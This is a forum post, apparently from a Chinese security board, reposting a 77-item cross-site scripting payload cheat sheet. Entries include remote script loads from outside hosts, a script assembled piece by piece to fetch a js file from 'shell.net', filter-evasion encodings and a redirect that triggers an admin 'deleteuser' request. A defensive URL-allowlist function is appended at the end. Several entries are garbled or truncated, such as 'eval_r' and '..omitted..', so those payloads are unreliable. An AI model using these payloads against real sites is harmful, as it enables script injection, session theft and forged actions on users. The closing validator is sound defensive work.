There seems to be rather little XSS material on t00ls, so when I saw this good stuff I copied it over; not sure whether any classmates need to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolons or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multiline embedded JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping out of filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with linked URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with STYLE (built from an open angle bracket and a leading letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS gets filtered, you can put JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; it can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Leaving out [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Leaving out [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
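An example I am adding here, not part of the copied list: a scheme-allowlist check for a user-supplied URL that first undoes the case, entity, control-character and null-byte tricks of vectors (3) to (19) and the protocol-relative form of (74), and only then decides. The helper names are my own, and the inputs it is meant for are constructed from the vectors above.

```javascript
// Added example (not from the copied list): allowlist a URL before it goes
// into an href/src. Helper names are my own.
const SAFE_SCHEMES = new Set(["http", "https", "mailto"]);

// Only the named references that can hide a scheme; real code should run a
// full HTML entity decoder (e.g. the "he" package) instead of this table.
const NAMED_REFS = { "&colon;": ":", "&Tab;": "\t", "&NewLine;": "\n" };

// Guard against code points beyond the Unicode range, which fromCodePoint rejects.
function cpToStr(cp) {
  return cp > 0x10ffff ? "\ufffd" : String.fromCodePoint(cp);
}

// Browsers decode numeric references with a semicolon (&#106; &#x6A;),
// without one (&#106 &#x6A) and with leading zeros (&#0000106): undo all three.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cpToStr(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cpToStr(parseInt(d, 10)))
    .replace(/&(colon|Tab|NewLine);/g, (m) => NAMED_REFS[m]);
}

// Drop what the parsers ignore around a scheme: C0 controls (the tab, LF and
// CR of vectors 11-14, the NUL of 17-18), space, DEL and the Unicode
// whitespace noted in vector 47 (NBSP, U+2000-200A, U+3000, U+FEFF).
// Backslash behaves like "/" in http-style URLs, so map it before the "//" test.
function normalizeForCheck(raw) {
  return decodeEntities(String(raw))
    .replace(/[\x00-\x20\x7f\u00a0\u2000-\u200a\u3000\ufeff]/g, "")
    .replace(/\\/g, "/")
    .toLowerCase();
}

// true when the URL may be emitted: a relative URL (no scheme and not
// protocol-relative, so vector 74 is refused) or an allowlisted scheme.
// Host tricks such as vectors 70-73 are out of scope here: an http URL to a
// decimal-IP host is still an http URL and needs a separate host policy.
function isSafeUrl(raw) {
  const url = normalizeForCheck(raw);
  const m = url.match(/^([a-z][a-z0-9+.-]*):/);
  if (!m) return !url.startsWith("//");
  return SAFE_SCHEMES.has(m[1]);
}

// For templates: the original value if it passes, otherwise a dead link.
function safeHref(raw) {
  return isSafeUrl(raw) ? String(raw) : "#";
}
```

Entity decoding only matters where the value is written into markup unescaped; with proper attribute escaping the scheme match alone decides, and host-level tricks such as (70) to (73) still need their own check.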